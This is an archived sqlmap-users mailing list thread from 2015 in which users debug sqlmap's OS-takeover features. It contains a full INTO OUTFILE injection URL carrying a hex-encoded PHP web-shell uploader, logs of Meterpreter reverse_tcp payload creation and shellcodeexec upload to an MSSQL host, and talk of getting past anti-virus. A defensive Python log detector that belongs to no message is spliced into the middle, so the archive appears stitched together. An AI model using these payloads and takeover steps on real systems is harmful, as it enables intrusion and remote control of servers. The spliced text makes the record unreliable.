>>> mysql> select 'ss' into outfile '/var/www/OwaspPractice/upload/tmpbezff.php';
>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>
>>> Solution:
>>>
>>> 1. Change the web shell name for every new PAYLOAD attempt, at least when using the -os-shell option
>>> 2. Fix the PAYLOAD causing problems.
>>>
>>> --
>>> DanUx
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
> --
> DanUx

--
Miroslav Stampar
http://about.me/stamparm |
From: Danux <da...@gm...> - 2015-07-04 22:41:40
|
Thanks

sqlmap --version
sqlmap/1.0-dev

In the meantime I will patch procs/mysql/write_file_limit.sql

On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:

> Which revision/version of sqlmap do you use? There has been a related patch a month ago. Will check tomorrow.
>
> Bye
>
> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>
>> Hello list, there is an issue with sqlmap when using the --os-shell option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>
>> Description:
>>
>> A specific PAYLOAD (see below) used to upload a web shell will create an empty file, e.g. tmpbezff.php; this causes every subsequent PAYLOAD attempt to fail with an "already exists" error and therefore the web shell cannot be uploaded.
>>
>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>>
>> By default, MySQL will throw an error if the file already exists:
>>
>> mysql> select 'ss' into outfile '/var/www/OwaspPractice/upload/tmpbezff.php';
>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>
>> Solution:
>>
>> 1. Change the web shell name for every new PAYLOAD attempt, at least when using the -os-shell option
>> 2. Fix the PAYLOAD causing problems.
>>
>> --
>> DanUx
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
DanUx |
From: Miroslav S. <mir...@gm...> - 2015-07-04 22:40:09
|
Which revision/version of sqlmap do you use? There has been a related patch a month ago. Will check tomorrow.

Bye

On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:

> Hello list, there is an issue with sqlmap when using the --os-shell option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>
> Description:
>
> A specific PAYLOAD (see below) used to upload a web shell will create an empty file, e.g. tmpbezff.php; this causes every subsequent PAYLOAD attempt to fail with an "already exists" error and therefore the web shell cannot be uploaded.
>
> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%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--+
>
> By default, MySQL will throw an error if the file already exists:
>
> mysql> select 'ss' into outfile '/var/www/OwaspPractice/upload/tmpbezff.php';
> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>
> Solution:
>
> 1. Change the web shell name for every new PAYLOAD attempt, at least when using the -os-shell option
> 2. Fix the PAYLOAD causing problems.
>
> --
> DanUx

--
Miroslav Stampar
http://about.me/stamparm |
From: Danux <da...@gm...> - 2015-07-04 22:33:13
|
Hello list, there is an issue with sqlmap when using the --os-shell option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)

Description:

A specific PAYLOAD (see below) used to upload a web shell will create an empty file, e.g. tmpbezff.php; this causes every subsequent PAYLOAD attempt to fail with an "already exists" error and therefore the web shell cannot be uploaded.

http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%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--+

By default, MySQL will throw an error if the file already exists:

mysql> select 'ss' into outfile '/var/www/OwaspPractice/upload/tmpbezff.php';
ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' already exists

Solution:

1. Change the web shell name for every new PAYLOAD attempt, at least when using the -os-shell option
2. Fix the PAYLOAD causing problems.

--
DanUx |
From: Gianluca C. B. <g...@br...> - 2015-07-02 12:14:40
|
----- Original message -----
From: "sql...@li..." <sql...@li...>
Sent: 02/07/2015 14:02
To: "sql...@li..." <sql...@li...>
Subject: sqlmap-users Digest, Vol 50, Issue 2

Today's Topics:

   1. Error with operating system takeover (meterpreter) (Peter Laboratra)
   2. Upload file with SQL Injection (Peter Laboratra)
   3. Re: Upload file with SQL Injection (Brandon Perry)
   4. Re: Error with operating system takeover (meterpreter) (Miroslav Stampar)
   5. Re: Error with operating system takeover (meterpreter) (Peter Laboratra)
   6. Re: Error with operating system takeover (meterpreter) (Miroslav Stampar)
   7. Re: Error with operating system takeover (meterpreter) (Peter Laboratra)

----------------------------------------------------------------------

Message: 1
Date: Wed, 1 Jul 2015 20:25:20 +0530
From: Peter Laboratra <myp...@gm...>
Subject: [sqlmap-users] Error with operating system takeover (meterpreter)
To: sql...@li...
Message-ID: <CAGr38JNrhJBHa23WuMDw=byU...@ma...>
Content-Type: text/plain; charset="utf-8"

Hi All,

In the first phase of our test we discovered that the Target URL is vulnerable and we managed to retrieve lots of information such as --users, --dbs, some of --tables and lots more. All this retrieval was very slow, probably due to the time-based vulnerability; however, we tried all techniques (BEUSTQ) and found the same state.

During an attempt a few days after our success we noticed that some of the parameters are not working and we are receiving errors; for instance, during a re-query for --users we received the error "[09:39:23] [CRITICAL] unable to retrieve the number of database users". During a re-query for -U sa --passwords we received "unnable to retrieve the password hashes for the database users (probably because the session user has no read privileges over the relevant system database table)".

We moved to OS takeover; initially we got an error for xp_cmdshell, however we activated and confirmed it using SQLNinja and moved on to get --os-shell, executed some commands like "hostname", "whoami" and successfully retrieved their output.

Now, after a few minutes, we noted that we are not getting any output for any command, with the message "No output".

We moved to --os-pwn + --msf-path, but again with no success on meterpreter or VNC. We received the error "HTTP error codes detected during run: 404 (Not Found) - 1 times"

I'm attaching the screen log; please help me with this if there is any scope available.
Thanks in Advance.

-------screen logs start-------

root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf7 -v 2

        _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:03:33

mytarget_login
[10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
[10:03:33] [DEBUG] not a valid WebScarab log data
[10:03:33] [DEBUG] cleaning up configuration parameters
test_msf7
mytarget_login
/opt/metasploit/apps/pro/msf3
[10:03:33] [INFO] setting file for logging HTTP traffic
[10:03:33] [DEBUG] setting the HTTP timeout
[10:03:33] [DEBUG] creating HTTP requests opener object
[10:03:33] [DEBUG] forcing back-end DBMS to user defined value
[10:03:33] [DEBUG] setting the takeover out-of-band functionality
[10:03:33] [DEBUG] provided Metasploit Framework path '/opt/metasploit/apps/pro/msf3' is valid
[10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
[10:03:33] [DEBUG] resolving hostname 'mytarget.com'
[10:03:33] [INFO] testing connection to the target URL
[10:03:48] [DEBUG] declared web page charset 'utf-8'
sqlmap got a 302 redirect to 'https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection reset by peer')
[10:03:56] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: testNumber (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333'; WAITFOR DELAY '0:0:5'--&testPassword=3243
    Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[10:03:56] [INFO] testing Microsoft SQL Server
[10:03:56] [INFO] confirming Microsoft SQL Server
[10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo? as temporary files directory
[10:04:00] [INFO] testing if current user is DBA
[10:04:00] [DEBUG] creating a support table to write commands standard output to
[10:04:00] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[10:04:04] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
[10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
[10:04:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:04:05] [ERROR] unable to retrieve xp_cmdshell output
[10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports example3ween the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [192.168.1.8]
which local port number do you want to use? [61371]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[10:04:17] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
[10:04:17] [INFO] creation in progress .................. done
[10:04:35] [DEBUG] the shellcode size is 308 bytes
[10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo?/tmpsebykt.exe'
[10:04:35] [DEBUG] going to upload the binary file with stacked query SQL injection technique
[10:04:35] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo?\tmpsebykt.exe'
[10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo?\tmpfidjf.txt, please wait..
[10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo?\tmppsbcbi.ps1
[10:04:36] [DEBUG] executing the PowerShell base64-decoding script to write the D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo?\tmpsebykt.exe file, please wait..
[10:04:37] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
[10:04:37] [DEBUG] checking the length of the remote file D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo?\tmpsebykt.exe
[10:04:37] [INFO] retrieved:
[10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
[10:04:37] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
do you want to try to upload the file with the custom Visual Basic script technique? [Y/n] Y
[10:04:41] [INFO] using a custom visual basic script to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo?\tmpsebykt.exe', please wait..
[10:04:41] [DEBUG] uploading the file base64-encoded content to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo?\tmpfegab.txt, please wait..
[10:04:41] [CRITICAL] page not found (404)
[10:04:41] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

[*] shutting down at 10:04:41

root@kali:~#
-------screen logs end-------

Please help!!

------------------------------

Message: 2
Date: Wed, 1 Jul 2015 20:32:01 +0530
From: Peter Laboratra <myp...@gm...>
Subject: [sqlmap-users] Upload file with SQL Injection
To: sql...@li...
Message-ID: <CAGr38JNfRqwtyCmmzEOcLRmRHJW5=7Qm_e2y0njqjfEh8WH=eQ...@ma...>
Content-Type: text/plain; charset="utf-8"

Hi All,

Need help in uploading a non-malicious file on a vulnerable target.

In several cases I noted that shell upload or meterpreter fails due to an effective & active Anti-Virus installed on the vulnerable target, as it gets deleted due to its malicious nature (even after a certain level of msf encoding).

I also noted that in most of the cases the method of uploading using --sql-shell fails due to lack of stacked-query related issues.

In that case, is there a way to upload a file which is not malicious, if the objective is not to take control of the system and just requires uploading a file?

------------------------------

Message: 3
Date: Wed, 1 Jul 2015 10:10:47 -0500
From: Brandon Perry <bpe...@gm...>
Subject: Re: [sqlmap-users] Upload file with SQL Injection
To: Peter Laboratra <myp...@gm...>
Cc: sqlmap users <sql...@li...>
Message-ID: <CAO...@ma...>
Content-Type: text/plain; charset="utf-8"

--file-write allows you to write a file, and has the ability to check if the file was written by testing the size of the file against the file you have written locally, to ensure it was written ~correctly.

On Wed, Jul 1, 2015 at 10:02 AM, Peter Laboratra <myp...@gm...> wrote:

> Hi All,
>
> Need help in uploading a non-malicious file on a vulnerable target.
>
> In several cases I noted that shell upload or meterpreter fails due to an effective & active Anti-Virus installed on the vulnerable target, as it gets deleted due to its malicious nature (even after a certain level of msf encoding).
>
> I also noted that in most of the cases the method of uploading using --sql-shell fails due to lack of stacked-query related issues.
>
> In that case, is there a way to upload a file which is not malicious, if the objective is not to take control of the system and just requires uploading a file?

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

------------------------------

Message: 4
Date: Thu, 2 Jul 2015 00:26:30 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] Error with operating system takeover (meterpreter)
To: Peter Laboratra <myp...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID: <CA+...@ma...>
Content-Type: text/plain; charset="utf-8"

Hi.

1) First of all, please don't restrain sqlmap to only use "stacked" SQLi. That way you'll kill the possibility to get perfectly valid results with other techniques.

2) In the current state, you've got some "trashy" characters (because of the combination of a laggy connection and stacked SQLi), like: "D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo ?". Please use --fresh-queries in such situations (once per run where you expect a resume of trashy chars) to force sqlmap to try to retrieve the problematic value once again.

Bye

On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...> wrote:

> Hi All,
>
> In the first phase of our test we discovered that the Target URL is vulnerable and we managed to retrieve lots of information such as --users, --dbs, some of --tables and lots more. All this retrieval was very slow, probably due to the time-based vulnerability; however, we tried all techniques (BEUSTQ) and found the same state.
>
> During an attempt a few days after our success we noticed that some of the parameters are not working and we are receiving errors; for instance, during a re-query for --users we received the error "[09:39:23] [CRITICAL] unable to retrieve the number of database users". During a re-query for -U sa --passwords we received "unnable to retrieve the password hashes for the database users (probably because the session user has no read privileges over the relevant system database table)".
>
> We moved to OS takeover; initially we got an error for xp_cmdshell, however we activated and confirmed it using SQLNinja and moved on to get --os-shell, executed some commands like "hostname", "whoami" and successfully retrieved their output.
>
> Now, after a few minutes, we noted that we are not getting any output for any command, with the message "No output".
>
> We moved to --os-pwn + --msf-path, but again with no success on meterpreter or VNC. We received the error "HTTP error codes detected during run: 404 (Not Found) - 1 times"
>
> I'm attaching the screen log; please help me with this if there is any scope available.
> Thanks in Advance.
>
> -------screen logs start-------
>
> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf7 -v 2
>
>         _
>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 10:03:33
>
> mytarget_login
> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
> [10:03:33] [DEBUG] not a valid WebScarab log data
> [10:03:33] [DEBUG] cleaning up configuration parameters
> test_msf7
> mytarget_login
> /opt/metasploit/apps/pro/msf3
> [10:03:33] [INFO] setting file for logging HTTP traffic
> [10:03:33] [DEBUG] setting the HTTP timeout
> [10:03:33] [DEBUG] creating HTTP requests opener object
> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
> [10:03:33] [DEBUG] provided Metasploit Framework path '/opt/metasploit/apps/pro/msf3' is valid
> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
> [10:03:33] [INFO] testing connection to the target URL
> [10:03:48] [DEBUG] declared web page charset 'utf-8'
> sqlmap got a 302 redirect to 'https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to follow? [Y/n] Y
> redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection reset by peer')
> [10:03:56] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Parameter: testNumber (POST)
>     Type: stacked queries
>     Title: Microsoft SQL Server/Sybase stacked queries
>     Payload: example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333'; WAITFOR DELAY '0:0:5'--&testPassword=3243
>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
> ---
> [10:03:56] [INFO] testing Microsoft SQL Server
> [10:03:56] [INFO] confirming Microsoft SQL Server
> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
> back-end DBMS: Microsoft SQL Server 2008
> how do you want to establish the tunnel?
> [1] TCP: Metasploit Framework (default)
> [2] ICMP: icmpsh - ICMP tunneling
> > 1
> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo ? as temporary files directory
> [10:04:00] [INFO] testing if current user is DBA
> [10:04:00] [DEBUG] creating a support table to write commands standard output to
> [10:04:00] [WARNING] time-based comparison requires larger statistical model, please wait..............................
> [10:04:04] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
> [10:04:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
> which connection type do you want to use?
> [1] Reverse TCP: Connect back from the database host to this machine (default)
> [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports example3ween the specified and 65535
> [3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
> [4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
> [5] Bind TCP: Listen on the database host for a connection
> > 1
> what is the local address? [192.168.1.8]
> which local port number do you want to use? [61371]
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> > 1
> [10:04:17] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf

[the original message is not included] |
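Both threads above leave characteristic traces in request logs: Danux's report shows a MySQL `INTO OUTFILE` write whose content travels as a `0x...` hex literal, and the screen log in the digest shows an MSSQL stacked `WAITFOR DELAY` time-based probe. The block below is an added example, not code from any message on this list and not sqlmap's own code: a small Python detector that runs over a few constructed access-log lines, URL-decodes each request, flags `INTO OUTFILE`/`DUMPFILE` statements (reporting the destination path and decoding the hex literal so an analyst can see whether script markup was written) and flags `WAITFOR DELAY` probes. The log format is an assumption (a trailing field carrying the POST body, which a stock combined log does not record, so a proxy or WAF log is implied); the hostnames, paths and the harmless hex literal are constructed for the example.

```python
"""Detector for MySQL INTO OUTFILE writes and MSSQL WAITFOR DELAY probes in
request logs. Added example for this thread; not code from sqlmap or from any
of the list members. All sample data below is constructed."""
import re
from urllib.parse import unquote_plus

# Constructed log format (assumption): ip [timestamp] "METHOD target [HTTP/x.y]"
# status body. The last field holds the logged POST body or "-"; a stock
# combined log would not contain it, so a reverse-proxy or WAF log is assumed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)'
    r'(?: HTTP/[\d.]+)?" (?P<status>\d{3}) (?P<body>\S+)$'
)

# Patterns applied after URL decoding. INTO OUTFILE / DUMPFILE is the MySQL
# file-write primitive behind the --os-shell stager in the thread; WAITFOR
# DELAY is the MSSQL time-based inference primitive in the digest's screen log.
OUTFILE_RE = re.compile(r"INTO\s+(?:OUT|DUMP)FILE\s+'(?P<path>[^']+)'", re.IGNORECASE)
WAITFOR_RE = re.compile(r"WAITFOR\s+DELAY\s+'(?P<delay>[\d:]+)'", re.IGNORECASE)
HEX_LITERAL_RE = re.compile(r"\b0x([0-9a-fA-F]+)\b")

# Markers that indicate server-side script markup in a decoded literal.
SCRIPT_MARKERS = ("<?php", "<?", "<%", "<script")

# Constructed sample: a benign request, an OUTFILE write whose hex literal
# decodes to the harmless marker "<?php echo 'test'; ?>", and a time-based
# probe carried in a POST body.
SAMPLE_LOG = """\
203.0.113.5 [04/Jul/2015:22:30:01 +0000] "GET /injection/lessons/lesson03/index.php?code=N HTTP/1.1" 200 -
203.0.113.5 [04/Jul/2015:22:30:02 +0000] "GET /injection/lessons/lesson03/index.php?code=N%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/example/upload/tmpabcde.php%27%20LINES%20TERMINATED%20BY%200x3c3f706870206563686f202774657374273b203f3e--+ HTTP/1.1" 200 -
203.0.113.5 [04/Jul/2015:22:30:03 +0000] "POST /tryexample_ex/login.aspx HTTP/1.1" 302 testNumber=1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27--
"""


def decode_hex_literal(digits):
    """Decode the digits of a MySQL 0x... literal to text, or None if invalid."""
    if len(digits) % 2:
        return None
    try:
        return bytes.fromhex(digits).decode("utf-8", errors="replace")
    except ValueError:
        return None


def analyse_request(raw):
    """Return the findings for one raw (still URL-encoded) query string or body."""
    text = unquote_plus(raw)
    findings = []
    m = OUTFILE_RE.search(text)
    if m:
        finding = {"type": "mysql_outfile", "path": m.group("path"),
                   "content": None, "script_like": False}
        # Decode every hex literal in the statement: the written content is
        # normally carried as one, so the analyst can see what hit the disk.
        for digits in HEX_LITERAL_RE.findall(text):
            decoded = decode_hex_literal(digits)
            if decoded is not None:
                finding["content"] = decoded
                finding["script_like"] = any(mk in decoded for mk in SCRIPT_MARKERS)
        findings.append(finding)
    m = WAITFOR_RE.search(text)
    if m:
        findings.append({"type": "mssql_timebased", "delay": m.group("delay")})
    return findings


def scan_log(log_text):
    """Parse each line and run both checks on the target URL and the logged body."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        for part in (m.group("target"), m.group("body")):
            if part == "-":
                continue
            for finding in analyse_request(part):
                finding.update(ip=m.group("ip"), ts=m.group("ts"), status=m.group("status"))
                alerts.append(finding)
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Running the block prints one alert for the OUTFILE write (path, decoded content, `script_like` set) and one for the time-based probe. The decoded literal is the part worth acting on in the Danux case: once a `.php` file lands under the document root the write has already succeeded, so the alert should be paired with a file-integrity check of the upload directory. On the MySQL side, pointing `secure_file_priv` at a directory outside the web root (or setting it to NULL, which disables file import and export altogether) and withholding the FILE privilege from the application account removes the write path the payload depends on.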
From: Peter L. <myp...@gm...> - 2015-07-02 09:55:36
|
Hi,

This time I tried --flush-session as well, and now it is showing that the parameter is not injectable; however, when I'm using the old session (with -s old_sessionfile.sqlite) it is not showing this. I observed a similar issue a few days back when I tried to SQL-inject the same vulnerable parameter using sqlmap from Computer-2: it failed to identify the vulnerability in the target parameter; however, at the same time it was working with Computer-1. Did try --time-sec, -o etc. This is another weird issue in addition to the OS pwning one.

--start--
sqlmap -r mytarget_login -p testNumber --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf_newSession -v 2 --fresh-queries --flush-session
..
..
[05:20:28] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40 columns' because the level (4) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (random number) - 31 to 40 columns' because the level (5) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50 columns' because the level (5) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (random number) - 41 to 50 columns' because the level (5) is higher than the provided (1)
[05:20:28] [WARNING] POST parameter 'testNumber' is not injectable
[05:20:28] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

[*] shutting down at 05:20:28
--end--

On Thu, Jul 2, 2015 at 2:11 PM, Miroslav Stampar <mir...@gm...> wrote:

> In your case, 404 is an indication that the file has not been found in the expected place.
>
> Now I see that the temporary file path is not being "refreshed" by the --fresh-queries. Please rerun the whole case with the --flush-session
>
> Bye
>
> p.s. in your case sqlmap tried to upload the file to the trashy location because of the previously retrieved faulty temp location
>
> On Thu, Jul 2, 2015 at 9:13 AM, Peter Laboratra <myp...@gm...> wrote:
>
>> Hi,
>> Thanks for your reply.
>>
>> This time I tried with --fresh-queries without specific --techniques.
>>
>> Why am I getting the error "page not found (404)" again and again? Does it indicate that the file is being written but is deleted by anti-virus control or something, and that's why, while calling the uploaded file, the 404 error is appearing? Can this be the case? Need your opinion and expertise.
>>
>> Thanks
>>
>> --start---
>>
>> root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries
>>
>> which payload do you want to use?
>> [1] Meterpreter (default)
>> [2] Shell
>> [3] VNC
>> > 1
>> [11:12:52] [DEBUG] executing local command: /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R | /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o "/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX
>> [11:12:52] [INFO] creation in progress .................. done
>> [11:13:10] [DEBUG] the shellcode size is 308 bytes
>> [11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe'
>> [11:13:10] [DEBUG] going to upload the binary file with stacked query SQL injection technique
>> [11:13:10] [INFO] using PowerShell to write the binary file content to file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe'
>> [11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt, please wait..
